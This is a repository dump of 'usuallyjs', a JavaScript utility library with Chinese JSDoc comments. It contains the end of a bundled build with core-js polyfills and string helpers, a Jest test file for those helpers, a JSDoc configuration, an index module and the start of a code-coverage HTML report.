var arraySlice = [].slice;
var factories = {};
var construct = function (F, len, args) {
if (!(len in factories)) {
for (var n = [], i = 0; i < len; i++) n[i] = 'a[' + i + ']'; // eslint-disable-next-line no-new-func
factories[len] = Function('F,a', 'return new F(' + n.join(',') + ')');
}
return factories[len](F, args);
};
var _bind = Function.bind || function bind(that
/* , ...args */
) {
var fn = _aFunction(this);
var partArgs = arraySlice.call(arguments, 1);
var bound = function ()
/* args... */
{
var args = partArgs.concat(arraySlice.call(arguments));
return this instanceof bound ? construct(fn, args.length, args) : _invoke(fn, args, that);
};
if (_isObject(fn.prototype)) bound.prototype = fn.prototype;
return bound;
};
var rConstruct = (_global.Reflect || {}).construct; // MS Edge supports only 2 arguments and argumentsList argument is optional
// FF Nightly sets third argument as `new.target`, but does not create `this` from it
var NEW_TARGET_BUG = _fails(function () {
function F() {
/* empty */
}
return !(rConstruct(function () {
/* empty */
}, [], F) instanceof F);
});
var ARGS_BUG = !_fails(function () {
rConstruct(function () {
/* empty */
});
});
_export(_export.S + _export.F * (NEW_TARGET_BUG || ARGS_BUG), 'Reflect', {
construct: function construct(Target, args
/* , newTarget */
) {
_aFunction(Target);
_anObject(args);
var newTarget = arguments.length < 3 ? Target : _aFunction(arguments[2]);
if (ARGS_BUG && !NEW_TARGET_BUG) return rConstruct(Target, args, newTarget);
if (Target == newTarget) {
// w/o altered newTarget, optimization for 0-4 arguments
switch (args.length) {
case 0:
return new Target();
case 1:
return new Target(args[0]);
case 2:
return new Target(args[0], args[1]);
case 3:
return new Target(args[0], args[1], args[2]);
case 4:
return new Target(args[0], args[1], args[2], args[3]);
} // w/o altered newTarget, lot of arguments case
var $args = [null];
$args.push.apply($args, args);
return new (_bind.apply(Target, $args))();
} // with altered newTarget, not support built-in constructors
var proto = newTarget.prototype;
var instance = _objectCreate(_isObject(proto) ? proto : Object.prototype);
var result = Function.apply.call(Target, instance, args);
return _isObject(result) ? result : instance;
}
});
var construct$1 = _core.Reflect.construct;
var construct$2 = construct$1;
/* eslint-disable no-proto */
var check = function (O, proto) {
_anObject(O);
if (!_isObject(proto) && proto !== null) throw TypeError(proto + ": can't set as prototype!");
};
var _setProto = {
set: Object.setPrototypeOf || ('__proto__' in {} ? // eslint-disable-line
function (test, buggy, set) {
try {
set = _ctx(Function.call, _objectGopd.f(Object.prototype, '__proto__').set, 2);
set(test, []);
buggy = !(test instanceof Array);
} catch (e) {
buggy = true;
}
return function setPrototypeOf(O, proto) {
check(O, proto);
if (buggy) O.__proto__ = proto;else set(O, proto);
return O;
};
}({}, false) : undefined),
check: check
};
_export(_export.S, 'Object', {
setPrototypeOf: _setProto.set
});
var setPrototypeOf = _core.Object.setPrototypeOf;
var setPrototypeOf$1 = setPrototypeOf;
var setPrototypeOf$2 = createCommonjsModule(function (module) {
function _setPrototypeOf(o, p) {
module.exports = _setPrototypeOf = setPrototypeOf$1 || function _setPrototypeOf(o, p) {
o.__proto__ = p;
return o;
};
return _setPrototypeOf(o, p);
}
module.exports = _setPrototypeOf;
});
var construct$3 = createCommonjsModule(function (module) {
function isNativeReflectConstruct() {
if (typeof Reflect === "undefined" || !construct$2) return false;
if (construct$2.sham) return false;
if (typeof Proxy === "function") return true;
try {
Date.prototype.toString.call(construct$2(Date, [], function () {}));
return true;
} catch (e) {
return false;
}
}
function _construct(Parent, args, Class) {
if (isNativeReflectConstruct()) {
module.exports = _construct = construct$2;
} else {
module.exports = _construct = function _construct(Parent, args, Class) {
var a = [null];
a.push.apply(a, args);
var Constructor = Function.bind.apply(Parent, a);
var instance = new Constructor();
if (Class) setPrototypeOf$2(instance, Class.prototype);
return instance;
};
}
return _construct.apply(null, arguments);
}
module.exports = _construct;
});
var _stringWs = '\x09\x0A\x0B\x0C\x0D\x20\xA0\u1680\u180E\u2000\u2001\u2002\u2003' + '\u2004\u2005\u2006\u2007\u2008\u2009\u200A\u202F\u205F\u3000\u2028\u2029\uFEFF';
var space = '[' + _stringWs + ']';
var non = '\u200b\u0085';
var ltrim = RegExp('^' + space + space + '*');
var rtrim = RegExp(space + space + '*$');
var exporter = function (KEY, exec, ALIAS) {
var exp = {};
var FORCE = _fails(function () {
return !!_stringWs[KEY]() || non[KEY]() != non;
});
var fn = exp[KEY] = FORCE ? exec(trim) : _stringWs[KEY];
if (ALIAS) exp[ALIAS] = fn;
_export(_export.P + _export.F * FORCE, 'String', exp);
}; // 1 -> String#trimLeft
// 2 -> String#trimRight
// 3 -> String#trim
var trim = exporter.trim = function (string, TYPE) {
string = String(_defined(string));
if (TYPE & 1) string = string.replace(ltrim, '');
if (TYPE & 2) string = string.replace(rtrim, '');
return string;
};
var _stringTrim = exporter;
var $parseInt = _global.parseInt;
var $trim = _stringTrim.trim;
var hex = /^[-+]?0[xX]/;
var _parseInt = $parseInt(_stringWs + '08') !== 8 || $parseInt(_stringWs + '0x16') !== 22 ? function parseInt(str, radix) {
var string = $trim(String(str), 3);
return $parseInt(string, radix >>> 0 || (hex.test(string) ? 16 : 10));
} : $parseInt;
_export(_export.G + _export.F * (parseInt != _parseInt), {
parseInt: _parseInt
});
var _parseInt$1 = _core.parseInt;
var _parseInt$2 = _parseInt$1;
/**
* 获取字符串的字节长度
* @function byteSize
* @param {string} str - 字符串
* @return {number}
* @example
* U.byteSize('日')
* // => 3
*
* U.byteSize('12')
* // => 2
*
* U.byteSize('hello')
* // => 5
*/
var byteSize = function byteSize(str) {
return new Blob([str]).size;
};
/**
* 反转字符串
* @function reverseString
* @param {string} str - 字符串
* @return {str}
* @example
* U.reverseString('hello!')
* // => '!olleh'
*/
var reverseString = function reverseString(str) {
return toConsumableArray(str).reverse().join('');
};
/**
* 向URL追加参数
* @function stringifyURL
* @param {string} url - URL路径
* @param {object} params - 参数对象
* @return {string}
* @example
* U.stringifyURL('https://www.google.com/', {name: 'john', age: 30})
* // => 'https://www.google.com/?name=john&age=30'
*/
var stringifyURL = function stringifyURL(url, params) {
url += /\?/.test(url) ? '&' : '?';
return url += keys$1(params).map(function (key) {
return "".concat(key, "=").concat(params[key]);
}).join('&');
};
/**
* 解析URL参数
* @function parseURL
* @param {string} url - 字符串
* @return {object}
* @example
* U.parseURL('http://url.com/page?name=Adam&surname=Smith')
* // => {name: 'Adam', surname: 'Smith'}
*
* U.parseURL('https://www.google.com/')
* // => {}
*/
var parseURL = function parseURL(url) {
var arr = url.match(/([^?=&]+)(=([^&]*))/g) || [];
return arr.reduce(function (a, v) {
return a[v.slice(0, v.indexOf('='))] = v.slice(v.indexOf('=') + 1), a;
}, {});
};
/**
* 移除字符串中的HTML标签
* @function removeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<p>这是<em>一个</em>段落。</p>'
* U.removeHTML(str)
* // => '这是一个段落。'
*/
var removeHTML = function removeHTML(str) {
return str.replace(/<[^>]*>/g, '');
};
/**
* 转义特殊字符
* @function escapeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<a href="#">you & me</a>'
* U.escapeHTML(str)
* // => '<a href="#">you & me</a>'
*/
var escapeHTML = function escapeHTML(str) {
return str.replace(/[&<>"]/g, function (tag) {
return {
'&': '&',
'<': '<',
'>': '>',
'"': '"'
}[tag] || tag;
});
};
/**
* 反转义特殊字符
* @function unescapeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<a href="#">you & me</a>'
* U.unescapeHTML(str)
* // => '<a href="#">you & me</a>'
*/
var unescapeHTML = function unescapeHTML(str) {
return str.replace(/&|<|>|"/g, function (tag) {
return {
'&': '&',
'<': '<',
'>': '>',
'"': '"'
}[tag] || tag;
});
};
/**
* 使用指定的掩码字符替换start~end之间的所有字符
* @function mask
* @param {string|number} str - 字符串
* @param {number} [start=0] - 可选,开始位置,默认为0(即字符串开头)
* @param {number} [end=0] - 可选,结束位置,默认为0(即字符串结尾)
* @param {string} [mask='*'] - 可选,掩码字符,默认为'*'号
* @return {string}
* @example
* U.mask(123456789) // => *********
* U.mask(123456789, 3) // => 123******
* U.mask(str, 0, 4) // => *****6789
* U.mask(str, 3, 4) // => 123**6789
* U.mask(str, 3, 4, '&') // => 123&&6789
*/
var mask = function mask(str) {
var start = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 0;
var end = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : 0;
var mask = arguments.length > 3 && arguments[3] !== undefined ? arguments[3] : '*';
return toConsumableArray("".concat(str)).map(function (v, i) {
return i >= start && i < "".concat(str).length - end ? mask : v;
}).join('');
};
/**
* 随机生成16进制色值
* @function randomHex
* @return {string}
* @example
* U.randomHex()
* // => "#f13ba7"
*/
var randomHex = function randomHex() {
return '#' + (Math.random() * 0xfffff * 1000000).toString(16).slice(0, 6);
};
/**
* 随机生成rgba色值
* @function randomRgba
* @param {number} [min=0] - 可选,最小色阶
* @param {number} [max=256] - 可选,最大色阶
* @param {number} [alpha=1] - 可选,透明度
* @return {string}
* @example
* U.randomRgba()
* // => rgba(223,135,252,1)
*
* U.randomRgba(154, 211, 0.5)
* // => rgba(191,178,179,0.5)
*/
var randomRgba = function randomRgba() {
var min = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 0;
var max = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 256;
var alpha = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : 1;
var color = from_1$1({
length: 3
}).reduce(function (acc) {
return [].concat(toConsumableArray(acc), [Math.floor(random(min, max))]);
}, []).concat(alpha ? [alpha] : [0]).join(',');
return "rgba(".concat(color, ")");
};
/**
* 将3位16进制色值转为6位
* @function extendHex
* @param {string} shortHex - 字符串
* @return {string}
* @example
* U.extendHex('#03f')
* // => '#0033ff'
*
* U.extendHex('05a')
* // => '#0055aa'
*/
var extendHex = function extendHex(shortHex) {
return '#' + shortHex.slice(shortHex.startsWith('#') ? 1 : 0).split('').map(function (x) {
return x + x;
}).join('');
};
/**
* 将16进制hex色值转为rgb(或rgba)色值
* @function hexToRGB
* @param {string} hex - 字符串,16进制hex色值
* @param {number} alpha - 可选,色彩透明度
* @return {string}
* @example
* U.hexToRGB('#e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('#e5f', 0.5)
* // => rgba(238,85,255,0.5)
*/
var hexToRGB = function hexToRGB(hex, alpha) {
var hasAlpha = !isUndefined(alpha);
var result = hex.slice(hex.startsWith('#') ? 1 : 0);
if (result.length === 3) result = toConsumableArray(result).map(function (s) {
return s + s;
}).join('');
result = result.match(/[0-9a-f]{2}/gi).map(function (s) {
return _parseInt$2(s, 16);
}).concat(hasAlpha ? [alpha] : []).join(',');
return "rgb".concat(hasAlpha ? 'a' : '', "(").concat(result, ")");
};
/**
* 将rgb(或rgba)色值转为16进制hex色值
* @function RGBToHex
* @param {string} rgb - 字符串,rgb(或rgba)色值
* @return {string}
* @example
* U.RGBToHex('rgb(238,85,255)')
* // => #ee55ff
*
* U.RGBToHex('rgba(238,85,255,0.5)')
* // => #ee55ff
*/
var RGBToHex = function RGBToHex(rgb) {
return '#' + rgb.match(/\d{1,3}/g).slice(0, 3).map(function (s) {
return Number(s).toString(16).padStart(2, '0');
}).join('');
};
/**
* 解析cookie字符串
* @function parseCookie
* @param {string} str - 字符串
* @return {object}
* @example
* U.parseCookie('taken=bar; equation=E%3Dmc%5E2')
* // => {taken: 'bar', equation: 'E=mc^2'}
*/
var parseCookie = function parseCookie(str) {
return str.split(';').map(function (v) {
return v.split('=');
}).reduce(function (acc, v) {
acc[decodeURIComponent(v[0].trim())] = decodeURIComponent(v[1].trim());
return acc;
}, {});
};
/**
* 字符串转日期对象
* @function stringToDate
* @param {string} str - 字符串
* @return {date}
* @example
* U.stringToDate('2019/5-06').toString()
* // => Mon May 06 2019 00:00:00 GMT+0800 (中国标准时间)
*
* U.stringToDate('2019-5-06 20:21:22:500').toString()
* // => Mon May 06 2019 20:21:22 GMT+0800 (中国标准时间)
*/
var stringToDate = function stringToDate(str) {
var defs = [0, 1, 1, 0, 0, 0];
var args = str.split(/[^0-9]+/).map(function (v, i) {
var val = Number(v) || defs[i];
return i === 1 ? val - 1 : val;
});
return construct$3(Date, toConsumableArray(args));
};
/**
* 驼峰字符串转横线连接字符串
* @function camelToDash
* @param {string} str - 驼峰字符串
* @return {string}
* @example
* U.camelToDash('camelCase')
* => 'camel-case'
*/
var camelToDash = function camelToDash(str) {
return str.replace(/([A-Z])/g, "-$1").toLowerCase();
};
/**
* 横线连接字符串转驼峰字符串
* @function dashToCamel
* @param {string} str - 横线连接字符串
* @return {string}
* @example
* U.camelToDash('dash-case')
* => 'dashCase'
*/
var dashToCamel = function dashToCamel(str) {
return str.replace(/\-(\w)/g, function (a, l) {
return l.toUpperCase();
});
};
var usually = /*#__PURE__*/Object.freeze({
getType: getType,
isNumber: isNumber,
isString: isString,
isNull: isNull,
isUndefined: isUndefined,
isBoolean: isBoolean,
isSymbol: isSymbol$1,
isFunction: isFunction,
isArray: isArray$2,
isObject: isObject,
isInt: isInt,
toThousands: toThousands,
inRange: inRange,
round: round,
random: random,
keepFixed: keepFixed,
average: average,
once: once,
debounce: debounce,
throttle: throttle,
pipe: pipe,
dateFormat: dateFormat,
getMonthDays: getMonthDays,
getWeekday: getWeekday,
prevMonth: prevMonth,
nextMonth: nextMonth,
isAfterDate: isAfterDate,
spreadDate: spreadDate,
lastItem: lastItem,
uniqueItems: uniqueItems,
uniqueItemsBy: uniqueItemsBy,
repeatItems: repeatItems,
initArray: initArray,
mapObject: mapObject,
averageBy: averageBy,
maxBy: maxBy,
minBy: minBy,
chunk: chunk,
deepClone: deepClone,
deepFreeze: deepFreeze,
renameKeys: renameKeys,
omit: omit,
isEmpty: isEmpty,
get: get,
byteSize: byteSize,
reverseString: reverseString,
stringifyURL: stringifyURL,
parseURL: parseURL,
removeHTML: removeHTML,
escapeHTML: escapeHTML,
unescapeHTML: unescapeHTML,
mask: mask,
randomHex: randomHex,
randomRgba: randomRgba,
extendHex: extendHex,
hexToRGB: hexToRGB,
RGBToHex: RGBToHex,
parseCookie: parseCookie,
stringToDate: stringToDate,
camelToDash: camelToDash,
dashToCamel: dashToCamel
});
function ownKeys$1(object, enumerableOnly) { var keys = keys$1(object); if (getOwnPropertySymbols$1) { keys.push.apply(keys, getOwnPropertySymbols$1(object)); } if (enumerableOnly) keys = keys.filter(function (sym) { return getOwnPropertyDescriptor$1(object, sym).enumerable; }); return keys; }
function _objectSpread$1(target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] != null ? arguments[i] : {}; if (i % 2) { ownKeys$1(source, true).forEach(function (key) { defineProperty$3(target, key, source[key]); }); } else if (getOwnPropertyDescriptors$1) { defineProperties$1(target, getOwnPropertyDescriptors$1(source)); } else { ownKeys$1(source).forEach(function (key) { defineProperty$1(target, key, getOwnPropertyDescriptor$1(source, key)); }); } } return target; }
var usually$1 = _objectSpread$1({
version: version
}, usually);
return usually$1;
})));
<|start_filename|>test/string.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('byteSize', () => {
let s = U.byteSize('日')
expect(s).toBe(3)
s = U.byteSize('12')
expect(s).toBe(2)
s = U.byteSize('hello')
expect(s).toBe(5)
})
test('reverseString', () => {
let s = U.reverseString('hello!')
expect(s).toBe('!olleh')
})
test('stringifyURL', () => {
let s = U.stringifyURL('https://www.google.com/', {name: 'john', age: 30})
expect(s).toBe('https://www.google.com/?name=john&age=30')
s = U.stringifyURL('https://www.google.com/?name=john', {age: 30})
expect(s).toBe('https://www.google.com/?name=john&age=30')
})
test('parseURL', () => {
let s = U.parseURL('http://url.com/page?name=Adam&surname=Smith')
expect(s).toEqual({name: 'Adam', surname: 'Smith'})
s = U.parseURL('https://www.google.com/')
expect(s).toEqual({})
})
test('removeHTML', () => {
let s = U.removeHTML('<p>这是<em>一个</em>段落。</p>')
expect(s).toBe('这是一个段落。')
})
test('escapeHTML', () => {
expect(U.escapeHTML).toBeInstanceOf(Function)
let s = U.escapeHTML('<a href="#">you & me</a>')
expect(s).toBe('<a href="#">you & me</a>')
})
test('unescapeHTML', () => {
expect(U.unescapeHTML).toBeInstanceOf(Function)
let s = U.unescapeHTML('<a href="#">you & me</a>')
expect(s).toBe('<a href="#">you & me</a>')
})
test('mask', () => {
let s = U.mask(123456789)
expect(s).toBe('*********')
s = U.mask(123456789, 3)
expect(s).toBe('123******')
s = U.mask(123456789, 0, 4)
expect(s).toBe('*****6789')
s = U.mask(123456789, 3, 4)
expect(s).toBe('123**6789')
s = U.mask(123456789, 3, 4, '&')
expect(s).toBe('123&&6789')
s = U.mask(123456789, 5, 6)
expect(s).toBe('123456789')
s = U.mask('123456789', 0, 0, '&')
expect(s).toBe('&&&&&&&&&')
})
test('randomHex', () => {
expect(U.randomHex).toBeInstanceOf(Function)
})
test('randomRgba', () => {
expect(U.randomRgba).toBeInstanceOf(Function)
expect(typeof U.randomRgba()).toBe('string')
expect(U.randomRgba(120, 121, 0.5)).toBe('rgba(120,120,120,0.5)')
})
test('extendHex', () => {
let hex = U.extendHex('#03f')
expect(hex).toBe('#0033ff')
hex = U.extendHex('50a')
expect(hex).toBe('#5500aa')
})
test('hexToRGB', () => {
let r = U.hexToRGB('#e5f')
expect(r).toBe('rgb(238,85,255)')
r = U.hexToRGB('e5f')
expect(r).toBe('rgb(238,85,255)')
r = U.hexToRGB('#ee55ff', 0.5)
expect(r).toBe('rgba(238,85,255,0.5)')
})
test('RGBToHex', () => {
let r = U.RGBToHex('rgb(238,85,255)')
expect(r).toBe('#ee55ff')
r = U.RGBToHex('rgba(238,85,255,0.5)')
expect(r).toBe('#ee55ff')
})
test('parseCookie', () => {
const cookie = U.parseCookie('taken=bar; equation=E%3Dmc%5E2')
expect(cookie).toEqual({taken: 'bar', equation: 'E=mc^2'})
})
test('stringToDate', () => {
expect(U.stringToDate).toBeInstanceOf(Function)
let r = U.stringToDate('2019/5-06').toString()
expect(r).toBe('Mon May 06 2019 00:00:00 GMT+0800 (GMT+08:00)')
r = U.stringToDate('2019-5-06 20:21:22:500').toString()
expect(r).toBe('Mon May 06 2019 20:21:22 GMT+0800 (GMT+08:00)')
r = U.stringToDate('2019年2月').toString()
expect(r).toBe('Fri Feb 01 2019 00:00:00 GMT+0800 (GMT+08:00)')
})
test('camelToDash', () => {
expect(U.camelToDash).toBeInstanceOf(Function)
const s = U.camelToDash('camelCase')
expect(s).toBe('camel-case')
})
test('dashToCamel', () => {
expect(U.dashToCamel).toBeInstanceOf(Function)
const s = U.dashToCamel('dash-case')
expect(s).toBe('dashCase')
})
<|start_filename|>jsdoc.config.json<|end_filename|>
{
"tags": {
"allowUnknownTags": true, // 允许使用无法识别的标签
"dictionaries": ["jsdoc", "closure"] // 启用两个标准JSDoc标签和closure标签
},
"source": {
"include": "./src/", // 可选的路径数组,JSDoc应该为它们生成文档。
"exclude": ["./src/index.js"], // 可选的路径数组,JSDoc应该忽略的路径。
"includePattern": ".js$", // 一个可选的字符串,解释为一个正则表达式。此处只有js文件将会被JSDoc处理
"excludePattern": "(^|\\/|\\\\)_" // 一个可选的字符串,解释为一个正则表达式。任何以下划线开始的文件或目录都将被JSDoc忽略
},
"opts": { // 设置的命令行选项
"template": "node_modules/docdash", // 设置模板,此处使用docdash模板node_modules/docdash
"encoding": "utf8", // 字符编码格式
"destination": "./docs/", // 文档输出目录
"recurse": true, // 是否递归查找
"verbose": true
// "tutorials": "path/to/tutorials" // tutorials的配置文件
},
"plugins": [], // 无插件加载
"templates": { // 模板设置,以下模板使用@link标签呈现在纯文本
"cleverLinks": false,
"monospaceLinks": false
},
"docdash": { // 配置模板
"search": [true], // 是否启用搜索框
"sort": false, // 是否排序
"collapse": false, // 是否折叠导航
"openGraph": { // Open Graph options (mostly for Facebook and other sites to easily extract meta information)
"title": "usuallyjs是一个面向现代 Web 开发的 JavaScript 实用函数库", // Title of the website
"type": "website", // Type of the website
"image": "", // Main image/logo
"site_name": "usuallyjs是一个面向现代 Web 开发的 JavaScript 实用函数库", // Site name
"url": "http://www.jofun.win/usually/" // Main canonical URL for the main page of the site
},
"meta": { // Meta information options (mostly for search engines that have not indexed your site yet)
"title": "usuallyjs是一个面向现代 Web 开发的 JavaScript 实用函数库", // Also will be used as postfix to actualy page title, prefixed with object/document name
"description": "一个面向现代 Web 开发的 JavaScript 实用函数库", // Description of overal contents of your website
"keyword": "JavaScript,vue,react,web,函数库,实用函数" // Keywords for search engines
}
}
}
<|start_filename|>src/index.js<|end_filename|>
export * from './type'
export * from './number'
export * from './function'
export * from './date'
export * from './array'
export * from './object'
export * from './string'
<|start_filename|>coverage/lcov-report/string.js.html<|end_filename|>
<!doctype html>
<html lang="en">
<head>
<title>Code coverage report for string.js</title>
<meta charset="utf-8" />
<link rel="stylesheet" href="prettify.css" />
<link rel="stylesheet" href="base.css" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<style type='text/css'>
.coverage-summary .sorter {
background-image: url(sort-arrow-sprite.png);
}
</style>
</head>
<body>
<div class='wrapper'>
<div class='pad1'>
<h1>
<a href="index.html">All files</a> string.js
</h1>
<div class='clearfix'>
<div class='fl pad1y space-right2'>
<span class="strong">98.33% </span>
<span class="quiet">Statements</span>
<span class='fraction'>59/60</span>
</div>
<div class='fl pad1y space-right2'>
<span class="strong">91.18% </span>
<span class="quiet">Branches</span>
<span class='fraction'>31/34</span>
</div>
<div class='fl pad1y space-right2'>
<span class="strong">96.77% </span>
<span class="quiet">Functions</span>
<span class='fraction'>30/31</span>
</div>
<div class='fl pad1y space-right2'>
<span class="strong">100% </span>
<span class="quiet">Lines</span>
<span class='fraction'>46/46</span>
</div>
</div>
<p class="quiet">
Press <em>n</em> or <em>j</em> to go to the next uncovered block, <em>b</em>, <em>p</em> or <em>k</em> for the previous block.
</p>
</div>
<div class='status-line high'></div>
<pre><table class="coverage">
<tr><td class="line-count quiet"><a name='L1'></a><a href='#L1'>1</a>
<a name='L2'></a><a href='#L2'>2</a>
<a name='L3'></a><a href='#L3'>3</a>
<a name='L4'></a><a href='#L4'>4</a>
<a name='L5'></a><a href='#L5'>5</a>
<a name='L6'></a><a href='#L6'>6</a>
<a name='L7'></a><a href='#L7'>7</a>
<a name='L8'></a><a href='#L8'>8</a>
<a name='L9'></a><a href='#L9'>9</a>
<a name='L10'></a><a href='#L10'>10</a>
<a name='L11'></a><a href='#L11'>11</a>
<a name='L12'></a><a href='#L12'>12</a>
<a name='L13'></a><a href='#L13'>13</a>
<a name='L14'></a><a href='#L14'>14</a>
<a name='L15'></a><a href='#L15'>15</a>
<a name='L16'></a><a href='#L16'>16</a>
<a name='L17'></a><a href='#L17'>17</a>
<a name='L18'></a><a href='#L18'>18</a>
<a name='L19'></a><a href='#L19'>19</a>
<a name='L20'></a><a href='#L20'>20</a>
<a name='L21'></a><a href='#L21'>21</a>
<a name='L22'></a><a href='#L22'>22</a>
<a name='L23'></a><a href='#L23'>23</a>
<a name='L24'></a><a href='#L24'>24</a>
<a name='L25'></a><a href='#L25'>25</a>
<a name='L26'></a><a href='#L26'>26</a>
<a name='L27'></a><a href='#L27'>27</a>
<a name='L28'></a><a href='#L28'>28</a>
<a name='L29'></a><a href='#L29'>29</a>
<a name='L30'></a><a href='#L30'>30</a>
<a name='L31'></a><a href='#L31'>31</a>
<a name='L32'></a><a href='#L32'>32</a>
<a name='L33'></a><a href='#L33'>33</a>
<a name='L34'></a><a href='#L34'>34</a>
<a name='L35'></a><a href='#L35'>35</a>
<a name='L36'></a><a href='#L36'>36</a>
<a name='L37'></a><a href='#L37'>37</a>
<a name='L38'></a><a href='#L38'>38</a>
<a name='L39'></a><a href='#L39'>39</a>
<a name='L40'></a><a href='#L40'>40</a>
<a name='L41'></a><a href='#L41'>41</a>
<a name='L42'></a><a href='#L42'>42</a>
<a name='L43'></a><a href='#L43'>43</a>
<a name='L44'></a><a href='#L44'>44</a>
<a name='L45'></a><a href='#L45'>45</a>
<a name='L46'></a><a href='#L46'>46</a>
<a name='L47'></a><a href='#L47'>47</a>
<a name='L48'></a><a href='#L48'>48</a>
<a name='L49'></a><a href='#L49'>49</a>
<a name='L50'></a><a href='#L50'>50</a>
<a name='L51'></a><a href='#L51'>51</a>
<a name='L52'></a><a href='#L52'>52</a>
<a name='L53'></a><a href='#L53'>53</a>
<a name='L54'></a><a href='#L54'>54</a>
<a name='L55'></a><a href='#L55'>55</a>
<a name='L56'></a><a href='#L56'>56</a>
<a name='L57'></a><a href='#L57'>57</a>
<a name='L58'></a><a href='#L58'>58</a>
<a name='L59'></a><a href='#L59'>59</a>
<a name='L60'></a><a href='#L60'>60</a>
<a name='L61'></a><a href='#L61'>61</a>
<a name='L62'></a><a href='#L62'>62</a>
<a name='L63'></a><a href='#L63'>63</a>
<a name='L64'></a><a href='#L64'>64</a>
<a name='L65'></a><a href='#L65'>65</a>
<a name='L66'></a><a href='#L66'>66</a>
<a name='L67'></a><a href='#L67'>67</a>
<a name='L68'></a><a href='#L68'>68</a>
<a name='L69'></a><a href='#L69'>69</a>
<a name='L70'></a><a href='#L70'>70</a>
<a name='L71'></a><a href='#L71'>71</a>
<a name='L72'></a><a href='#L72'>72</a>
<a name='L73'></a><a href='#L73'>73</a>
<a name='L74'></a><a href='#L74'>74</a>
<a name='L75'></a><a href='#L75'>75</a>
<a name='L76'></a><a href='#L76'>76</a>
<a name='L77'></a><a href='#L77'>77</a>
<a name='L78'></a><a href='#L78'>78</a>
<a name='L79'></a><a href='#L79'>79</a>
<a name='L80'></a><a href='#L80'>80</a>
<a name='L81'></a><a href='#L81'>81</a>
<a name='L82'></a><a href='#L82'>82</a>
<a name='L83'></a><a href='#L83'>83</a>
<a name='L84'></a><a href='#L84'>84</a>
<a name='L85'></a><a href='#L85'>85</a>
<a name='L86'></a><a href='#L86'>86</a>
<a name='L87'></a><a href='#L87'>87</a>
<a name='L88'></a><a href='#L88'>88</a>
<a name='L89'></a><a href='#L89'>89</a>
<a name='L90'></a><a href='#L90'>90</a>
<a name='L91'></a><a href='#L91'>91</a>
<a name='L92'></a><a href='#L92'>92</a>
<a name='L93'></a><a href='#L93'>93</a>
<a name='L94'></a><a href='#L94'>94</a>
<a name='L95'></a><a href='#L95'>95</a>
<a name='L96'></a><a href='#L96'>96</a>
<a name='L97'></a><a href='#L97'>97</a>
<a name='L98'></a><a href='#L98'>98</a>
<a name='L99'></a><a href='#L99'>99</a>
<a name='L100'></a><a href='#L100'>100</a>
<a name='L101'></a><a href='#L101'>101</a>
<a name='L102'></a><a href='#L102'>102</a>
<a name='L103'></a><a href='#L103'>103</a>
<a name='L104'></a><a href='#L104'>104</a>
<a name='L105'></a><a href='#L105'>105</a>
<a name='L106'></a><a href='#L106'>106</a>
<a name='L107'></a><a href='#L107'>107</a>
<a name='L108'></a><a href='#L108'>108</a>
<a name='L109'></a><a href='#L109'>109</a>
<a name='L110'></a><a href='#L110'>110</a>
<a name='L111'></a><a href='#L111'>111</a>
<a name='L112'></a><a href='#L112'>112</a>
<a name='L113'></a><a href='#L113'>113</a>
<a name='L114'></a><a href='#L114'>114</a>
<a name='L115'></a><a href='#L115'>115</a>
<a name='L116'></a><a href='#L116'>116</a>
<a name='L117'></a><a href='#L117'>117</a>
<a name='L118'></a><a href='#L118'>118</a>
<a name='L119'></a><a href='#L119'>119</a>
<a name='L120'></a><a href='#L120'>120</a>
<a name='L121'></a><a href='#L121'>121</a>
<a name='L122'></a><a href='#L122'>122</a>
<a name='L123'></a><a href='#L123'>123</a>
<a name='L124'></a><a href='#L124'>124</a>
<a name='L125'></a><a href='#L125'>125</a>
<a name='L126'></a><a href='#L126'>126</a>
<a name='L127'></a><a href='#L127'>127</a>
<a name='L128'></a><a href='#L128'>128</a>
<a name='L129'></a><a href='#L129'>129</a>
<a name='L130'></a><a href='#L130'>130</a>
<a name='L131'></a><a href='#L131'>131</a>
<a name='L132'></a><a href='#L132'>132</a>
<a name='L133'></a><a href='#L133'>133</a>
<a name='L134'></a><a href='#L134'>134</a>
<a name='L135'></a><a href='#L135'>135</a>
<a name='L136'></a><a href='#L136'>136</a>
<a name='L137'></a><a href='#L137'>137</a>
<a name='L138'></a><a href='#L138'>138</a>
<a name='L139'></a><a href='#L139'>139</a>
<a name='L140'></a><a href='#L140'>140</a>
<a name='L141'></a><a href='#L141'>141</a>
<a name='L142'></a><a href='#L142'>142</a>
<a name='L143'></a><a href='#L143'>143</a>
<a name='L144'></a><a href='#L144'>144</a>
<a name='L145'></a><a href='#L145'>145</a>
<a name='L146'></a><a href='#L146'>146</a>
<a name='L147'></a><a href='#L147'>147</a>
<a name='L148'></a><a href='#L148'>148</a>
<a name='L149'></a><a href='#L149'>149</a>
<a name='L150'></a><a href='#L150'>150</a>
<a name='L151'></a><a href='#L151'>151</a>
<a name='L152'></a><a href='#L152'>152</a>
<a name='L153'></a><a href='#L153'>153</a>
<a name='L154'></a><a href='#L154'>154</a>
<a name='L155'></a><a href='#L155'>155</a>
<a name='L156'></a><a href='#L156'>156</a>
<a name='L157'></a><a href='#L157'>157</a>
<a name='L158'></a><a href='#L158'>158</a>
<a name='L159'></a><a href='#L159'>159</a>
<a name='L160'></a><a href='#L160'>160</a>
<a name='L161'></a><a href='#L161'>161</a>
<a name='L162'></a><a href='#L162'>162</a>
<a name='L163'></a><a href='#L163'>163</a>
<a name='L164'></a><a href='#L164'>164</a>
<a name='L165'></a><a href='#L165'>165</a>
<a name='L166'></a><a href='#L166'>166</a>
<a name='L167'></a><a href='#L167'>167</a>
<a name='L168'></a><a href='#L168'>168</a>
<a name='L169'></a><a href='#L169'>169</a>
<a name='L170'></a><a href='#L170'>170</a>
<a name='L171'></a><a href='#L171'>171</a>
<a name='L172'></a><a href='#L172'>172</a>
<a name='L173'></a><a href='#L173'>173</a>
